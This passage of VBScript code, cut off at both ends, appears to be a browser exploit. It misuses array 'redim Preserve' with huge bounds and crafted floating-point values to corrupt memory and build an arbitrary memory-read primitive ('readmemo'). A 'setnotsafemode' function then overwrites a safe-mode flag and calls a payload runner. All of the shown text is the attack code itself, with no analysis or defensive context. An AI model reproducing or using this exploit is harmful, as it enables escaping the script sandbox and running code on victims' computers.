Next\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0i=testaa\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0i=null\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0 Preserve aa(a2)\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ab(0)=0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0aa(a1)=i\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ab(0)=6.36598737437801E-314\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0aa(a1+2)=myarray\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ab(2)=1.74088534731324E-310\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0mydata=aa(a1)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0 Preserve aa(a0)\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end function \r\n\u00a0\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0function setnotsafemode()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0On Error Resume Next\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0i=mydata()\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0i=readmemo(i+8)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0i=readmemo(i+16)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0j=readmemo(i+&h134)\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0for k=0 to &h60 step 4\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0j=readmemo(i+&h120+k)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if(j=14) then\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0j=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0 Preserve aa(a2)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0aa(a1+2)(i+&h11c+k)=ab(4)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0 Preserve aa(a0)\u00a0 \r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0j=0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0j=readmemo(i+&h120+k)\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Exit for\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end if\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0next \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ab(2)=1.69759663316747E-313\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0runmumaa() \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end function\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0function Over()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0On Error Resume Next\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0dim type1,type2,type3\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Over=False\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0a0=a0+a3\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0a1=a0+2\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0a2=a0+&h8000000\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0 Preserve aa(a0) \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0\u00a0 ab(a0)\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0 Preserve aa(a2)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0type1=1\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ab(0)=1.123456789012345678901234567890\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0aa(a0)=10\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0If(IsObject(aa(a1-1)) = False) Then\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if(intVersion<4) then\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0mem=cint(a0+1)*16\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0j=vartype(aa(a1-1))\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if((j=mem+4) or (j*8=mem+8)) then\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if(vartype(aa(a1-1))<>0)\u00a0 Then\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0If(IsObject(aa(a1)) = False ) Then\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0type1=VarType(aa(a1))\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end if\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end if\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0else\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim\u00a0 Preserve aa(a0)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0exit\u00a0 function\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end if \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0else\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if(vartype(aa(a1-1))<>0)\u00a0 Then\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0If(IsObject(aa(a1)) = False ) Then\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0type1=VarType(aa(a1))\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end if\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end if\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end if\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end if\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0If(type1=&h2f66) 